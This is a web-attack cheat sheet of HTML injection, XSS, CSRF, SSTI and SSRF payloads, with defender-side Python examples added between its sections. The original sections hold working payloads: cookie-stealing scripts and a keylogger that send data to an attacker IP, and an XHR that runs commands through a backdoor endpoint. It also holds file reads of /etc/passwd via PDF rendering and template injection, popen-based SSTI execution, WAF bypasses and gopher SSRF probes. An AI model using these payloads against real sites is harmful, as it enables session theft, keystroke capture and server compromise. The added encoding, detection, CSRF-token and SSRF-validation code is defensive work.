XSS / HTMLi / (S/C)SRF / SSTI

01. HTML Injection

  • Basic Test Payloads

<h1>h4rithd was here</h1>
<b>h4rithd was here</b>
<img src="https://media.giphy.com/media/3XpvBjjMWtYYIOtOlp/giphy.gif"/>
<img src="https://media.tenor.com/He2W0AQvZfsAAAAC/hacked-hack.gif"/>

<marquee direction="up">h4rithd was here.</marquee>
<marquee direction="left" behavior="alternate">h4rithd was here</marquee>
<marquee behavior="scroll" direction="up"><img src="https://c.tenor.com/uXWSDlYIKl0AAAAM/danceroblox.gif"/></marquee>
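Added defender-side example (not part of the original cheat sheet): the fix for HTML injection is context-aware output encoding, and the quickest way to prove it works is to feed the probe strings above through an HTML parser before and after encoding. The sample inputs and the comment template are constructed for this example; `html.escape` and `html.parser` are Python standard library.

```python
import html
from html.parser import HTMLParser

# Constructed sample inputs that mirror the probe payloads above (not real user data).
SAMPLE_INPUTS = [
    '<h1>h4rithd was here</h1>',
    '<marquee direction="up">h4rithd was here.</marquee>',
    '<img src="https://example.invalid/x.gif"/>',
    'plain text with & ampersand and "quotes"',
]


def escape_for_html_body(value: str) -> str:
    """Entity-encode untrusted text that lands between tags (<, >, &, quotes)."""
    return html.escape(value, quote=True)


def escape_for_attribute(value: str) -> str:
    """Encode untrusted text placed inside a double-quoted attribute value.
    Same escaping set as the body; the caller must still wrap the result in quotes."""
    return html.escape(value, quote=True)


class _TagCollector(HTMLParser):
    """Records every start tag the parser creates, i.e. the markup a fragment
    would really produce instead of being shown as text."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_produced(fragment: str) -> list[str]:
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def render_comment(author: str, body: str) -> str:
    """Render a user comment with every untrusted value encoded for its context
    (hypothetical template, constructed for the example)."""
    return (
        '<div class="comment" data-author="%s">%s</div>'
        % (escape_for_attribute(author), escape_for_html_body(body))
    )


def injection_report(inputs=SAMPLE_INPUTS) -> list[dict]:
    """For each input, compare the tags a raw echo would create with the tags
    the encoded rendering creates (always just the wrapper div)."""
    return [
        {
            "input": s,
            "raw_tags": tags_produced(s),
            "encoded_tags": tags_produced(render_comment("h4rithd", s)),
        }
        for s in inputs
    ]
```

The report makes the point visible: echoing `<marquee ...>` raw yields a `marquee` element, while the encoded rendering yields only the `div` the application itself wrote. Encoding must be chosen per context; the two helpers here cover text nodes and quoted attributes, while JavaScript strings and URL attributes need their own encoders.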

02. Cross Site Scripting (XSS)

  • Steal Cookie

## ------------------| Setup on my machine
#### Basic (h4rithd.js)
fetch("http://<IP>/favicon.ico?c="+document.cookie);
#### Encoded
fetch("http://<IP>/favicon.ico?c=" + btoa(document.cookie))
fetch("http://<IP>/favicon.ico?c=" + encodeURIComponent(document.cookie))

## ------------------| Payload 
<script src="http://<IP>/h4rithd.js"></script>
  • Payloads

nc -lvnp 80
<script>document.write('<img src="http://<MYIP>/logo.gif?cookie='+document.cookie+'"/>')</script>
<script>new Image().src="http://<MYIP>/logo.jpg?output="+document.cookie;</script>
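Added detection example (not part of the original notes): every cookie-stealing payload above ends with a request to an attacker host whose query string carries `document.cookie`, raw or base64-encoded, and the same pattern shows up in the victim site's own logs when the exfil endpoint is a relative or same-host path, or in proxy logs. The log lines and the session-cookie name list are constructed for this example.

```python
import base64
import binascii
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed combined-format access-log lines (not from a real server). The
# second line carries the same cookie string as the first, base64-encoded the
# way the btoa() variant above would send it.
_B64_COOKIE = base64.b64encode(b"PHPSESSID=abc123; theme=dark").decode()
SAMPLE_LOG = f"""\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /favicon.ico?c=PHPSESSID%3Dabc123%3B%20theme%3Ddark HTTP/1.1" 200 0 "http://victim.example/profile" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /favicon.ico?c={_B64_COOKIE} HTTP/1.1" 200 0 "http://victim.example/profile" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /logo.gif?cookie=session%3Dxyz HTTP/1.1" 404 0 "-" "curl/8.0"
198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:56:03 +0000] "GET /search?q=hello+world HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
# name=value pairs separated by ';', which is the shape document.cookie produces.
COOKIE_PAIRS_RE = re.compile(r"[A-Za-z0-9_.\-]+=[^;\s]+(?:;\s*[A-Za-z0-9_.\-]+=[^;\s]+)*")
# Cookie names that usually carry a session or auth token (constructed list; extend for your apps).
SESSION_NAMES = {"phpsessid", "jsessionid", "session", "sessionid", "sid", "token", "auth", "connect.sid"}


def _decodings(value: str):
    """Yield the raw value and, when it is valid base64, its decoded text."""
    yield value
    padded = value + "=" * (-len(value) % 4)
    try:
        yield base64.b64decode(padded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return


def looks_like_cookie_jar(text: str) -> bool:
    m = COOKIE_PAIRS_RE.search(text)
    if not m:
        return False
    names = {pair.split("=", 1)[0].strip().lower() for pair in m.group(0).split(";")}
    return bool(names & SESSION_NAMES)


def find_cookie_exfil(log_text: str) -> list[dict]:
    """Flag requests whose query parameters carry something shaped like a
    session cookie string, raw or base64-encoded. The Referer tells you which
    page hosted the injected script."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlsplit(m["target"])
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            for candidate in _decodings(value):
                if looks_like_cookie_jar(candidate):
                    hits.append({"ip": m["ip"], "path": target.path, "param": name,
                                 "decoded": candidate, "referer": m["referer"]})
                    break
    return hits
```

The detection is only a backstop: marking the session cookie `HttpOnly` keeps `document.cookie` from exposing it in the first place, and a Content-Security-Policy without `unsafe-inline` and with a restricted `img-src`/`connect-src` stops the outbound request itself.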

## ------------------| Common payloads
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
<script>alert(123)</script>
<script>location.replace("https://h4rithd.com")</script>
<script>alert(localStorage.authorizations)</script>
<script>alert(JSON.stringify(localStorage))</script>
<img src='https://127.0.0.1/fav.ico?j0k3n='+JSON.stringify(localStorage);'--!>
"/><script>alert(123)</script>
"/><IMG SRC=x onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<img src=http://10.10.14.22/hit/>
<img src=x onerror=this.src='http://10.10.14.22/?cookies='+btoa(document.cookie)/>  
<xss id=x tabindex=1 onactivate=alert(1)></xss>
<script>location.replace("https://h4rithd.com")</script>

## ------------------| Other Payloads
<IMG onmouseover="alert('xss')">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC= onmouseover="alert('xss')">
<IMG SRC=# onmouseover="alert('xss')">
<IMG SRC=x onmouseover="alert('xss')">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
\<a onmouseover="alert(document.cookie)"\>xss link\</a\>
\<a onmouseover=alert(document.cookie)\>xss link\</a\>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

## ------------------| WAF Bypass
<svg on onload=(alert)(123)>
<svg onx=() onload=(confirm)(1)>
<x"/onclick=(confirm)()>h4rithd!
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img ignored=() src=x onerror=prompt(1)>
## ------------------| Host this from your end
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
var params = "cmd=dir | ping -n 2 10.10.14.22";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true;
xhr.send(params);

# catch this via payload
<script src=http://10.10.14.22/script.js></script>
  • Server Side XSS (Dynamic PDF)

## ------------------| Read local file
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(this.responseText)};
x.open("GET","file:///etc/passwd");x.send();
</script>

## If you need base64-encoded text, use this one instead.
x.onload=function(){document.write(btoa(this.responseText))};
  • Other APIs

## ------------------| Start the server to fetch the data
sudo python3 -m http.server 80

## ------------------| Extract stored passwords
<script>
for(let values of document.getElementsByTagName("input")){fetch("http://IP/favicon.ico?data=" + values.value);}
</script>

## ------------------| Keyloggers
<script>
function klog(event){fetch("http://IP/favicon.ico?data=" + event.key);}
document.addEventListener('keydown',klog);
</script>

03. Cross-Site Request Forgery (CSRF)

  • Create Payload

<html>
   <iframe src="http://MyIP/IFrameIsWorkingFine"></iframe>
   <iframe src="http://10.10.10.97/ChangePass?password=Welcome123"></iframe>
</html>
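Added defender-side example (not code from the original notes): the iframe above works because the browser attaches the victim's cookies to a GET that the attacker's page chose. The server-side checks that defeat it are a session-bound synchronizer token, an Origin/Referer check, and refusing to perform state changes on GET. The secret, the site origin (taken from the iframe target above), and the plain-dict request shape are assumptions for this example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions for this example: one server-side secret and one legitimate site origin.
SERVER_SECRET = b"example-secret-replace-with-a-random-key"
SITE_ORIGIN = "http://10.10.10.97"   # the application host targeted by the iframe above


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: nonce.HMAC(secret, session:nonce)."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def csrf_token_valid(session_id: str, token: str) -> bool:
    try:
        nonce, mac = token.split(".", 1)
    except (AttributeError, ValueError):
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def _origin_of(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def authorize_state_change(request: dict) -> tuple[bool, str]:
    """Checks a password-change style request must pass. `request` is a plain
    dict {method, headers, form, session_id} standing in for a framework object."""
    if request["method"].upper() != "POST":
        return False, "state-changing action must not be reachable by GET"
    headers = {k.lower(): v for k, v in request["headers"].items()}
    source = headers.get("origin") or headers.get("referer")
    if not source:
        return False, "no Origin or Referer header"
    if _origin_of(source) != SITE_ORIGIN:
        return False, f"cross-site request from {_origin_of(source)}"
    if not csrf_token_valid(request["session_id"], request["form"].get("csrf_token", "")):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# The forged request the hidden iframe would produce: the browser attaches the
# victim's cookies (session_id), but it is a GET, it comes from the attacker's
# page, and it carries no token. Values are constructed for the example.
FORGED_REQUEST = {
    "method": "GET",
    "headers": {"Referer": "http://attacker.example/lure.html"},
    "form": {"password": "Welcome123"},
    "session_id": "victim-session",
}


def legitimate_request(session_id: str, token: str) -> dict:
    """What the application's own password form submits."""
    return {
        "method": "POST",
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"password": "Welcome123", "csrf_token": token},
        "session_id": session_id,
    }
```

Binding the token to the session (rather than storing a random value per user) means a token captured from one session cannot be replayed in another. Setting the session cookie with `SameSite=Lax` or `Strict` adds a browser-side layer, but the server-side token remains the primary control.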

04. Server-Side Template Injection (SSTI)

{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
#{1+3+3+7}
${{<%[%'"}}%\.
{{.}}
{{user}}
{{config}}
{{password}}

{%include user%}
{%include config%}
{% include config %}
{%include password%}

{{ get_flashed_messages.globals.builtins.open("/etc/passwd").read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

## ------------------| Spring Framework
{"harithd".replace("a","4")}
{"".getClass().forName("java.lang.Runtime").getRuntime().exec("ping -c 2 <IP>")}
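Added defender-side example (not from the original notes) covering the whole SSTI section: a request filter that recognises the probe syntaxes listed above after undoing the URL and `\xNN` encodings that hide them, flags the names that turn an arithmetic probe into code execution, and, beside it, the safe rendering pattern in which untrusted input is passed to a fixed template as data. The syntax rules and name list are constructed; `string.Template` stands in for a real engine.

```python
import re
from string import Template
from urllib.parse import unquote

# Syntax families for the probe strings above (constructed detection rules;
# tune them to the engines your application actually uses).
TEMPLATE_SYNTAX = {
    "mustache-style expression {{ }}": re.compile(r"\{\{.*?\}\}", re.S),
    "jinja2/twig statement {% %}": re.compile(r"\{%.*?%\}", re.S),
    "dollar expression ${ }": re.compile(r"\$\{.*?\}", re.S),
    "erb/jsp tag <% %>": re.compile(r"<%=?.*?%>", re.S),
    "spring/thymeleaf #{ } *{ }": re.compile(r"[#*]\{.*?\}", re.S),
}
# Names that turn a harmless arithmetic probe into code execution.
DANGEROUS_NAMES = re.compile(
    r"__(?:class|globals|builtins|import|subclasses|init|getitem|mro)__|"
    r"getClass\s*\(|forName\s*\(|getRuntime\s*\(|\bpopen\b|\bbuiltins\b",
    re.I,
)


def normalize(value: str) -> str:
    """Undo the encodings that hide template syntax or dunder names from naive
    filters: URL-encoding and backslash-x / backslash-u escapes."""
    v = unquote(value)
    v = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), v)
    v = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), v)
    return v


def classify_ssti_probe(value: str) -> dict:
    """Which template syntaxes a parameter value contains and whether it
    references names associated with sandbox escapes."""
    v = normalize(value)
    families = [name for name, rx in TEMPLATE_SYNTAX.items() if rx.search(v)]
    return {"families": families, "dangerous": bool(DANGEROUS_NAMES.search(v)), "normalized": v}


def render_greeting(user_name: str) -> str:
    """The safe pattern: untrusted input is passed as *data* to a fixed template,
    never concatenated into the template source. string.Template stands in for
    a real engine here; the principle is the same for Jinja2, Twig or FreeMarker."""
    return Template("Hello, $name!").substitute(name=user_name)
```

A filter like this is a monitoring aid, not the fix. The fix is `render_greeting`'s shape: the template text is a constant chosen by the developer, and the request parameter only ever fills a variable, so `{{7*7}}` is displayed, not evaluated.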

05. Server-Side Request Forgery (SSRF)

### Setup local web server 
sudo python3 -m http.server 80

### Browse URL

### Scan local ports
/url.php?path=http://localhost:80
wfuzz -u 'http://10.10.10.55:60000/url.php?path=localhost:FUZZ' -z range,1-65535 --hl 2    
## ------------------| Test Vuln
### Setup Listener
sudo nc -lvnp 80
### Check if vulnerable
### [\n ==> %0a, %25%30%61 (double encoded), space ==> %20, %25%32%30 (double encoded)]
/url.php?path=gopher://<IP>:80/_GET / HTTP/1.0
/url.php?path=gopher://<IP>:80/_GET%%32%30%2fh4rithd.com%25%32%30HTTP/1.1
### Try to send internal requests
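Added defender-side example for the SSRF section (not from the original notes): the validation a URL-fetching endpoint such as `url.php?path=` needs before it makes an outbound request. It rejects the whitespace and newline injection shown above, allows only `http`/`https` on standard ports, and checks every address the host resolves to so that `localhost`, RFC 1918 ranges and the link-local metadata range are refused. The allow-lists and the stub resolver records are assumptions constructed for this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Policy assumptions for this example: only plain web fetches to the standard ports.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def resolve_all(host: str) -> set[str]:
    """Every address the host resolves to (an attacker-controlled name may mix
    public and internal records, so all of them are checked)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(text: str) -> bool:
    ip = ipaddress.ip_address(text.split("%", 1)[0])   # drop an IPv6 zone id
    return ip.is_global and not ip.is_multicast


def validate_fetch_url(url: str, resolver=resolve_all) -> tuple[bool, str]:
    # 1. Raw control characters or whitespace (the %0a / %20 tricks above, once
    #    decoded) must never reach the outbound request.
    if any(ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in url):
        return False, "control character or whitespace in URL"
    try:
        parts = urlsplit(url)
        port = parts.port
    except ValueError:
        return False, "unparseable URL or port"
    # 2. Scheme allow-list: gopher://, file://, dict:// and friends are rejected outright.
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme or '(none)'!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL (user@host confusion)"
    port = port or (443 if parts.scheme.lower() == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    # 3. Resolve and check every address so that localhost, 127.0.0.1, [::1],
    #    RFC 1918 ranges and link-local (cloud metadata) are all refused.
    try:
        ipaddress.ip_address(host)
        addresses = {host}
    except ValueError:
        try:
            addresses = resolver(host)
        except OSError:
            return False, "host does not resolve"
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"


def _stub_resolver(host: str) -> set[str]:
    """Offline resolver for the demonstration (constructed records, not real DNS)."""
    table = {
        "localhost": {"127.0.0.1", "::1"},
        "app.example": {"1.2.3.4"},
        "metadata.example": {"169.254.169.254"},
        "rebind.example": {"1.2.3.4", "10.0.0.5"},
    }
    if host not in table:
        raise socket.gaierror(f"no records for {host}")
    return table[host]
```

Two caveats a practitioner would add: the resolution check must be made on the addresses the HTTP client actually connects to (resolve once and connect to that address, or pin it), otherwise a DNS answer can change between the check and the fetch; and redirects must be re-validated, since a public host can 302 to an internal one.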
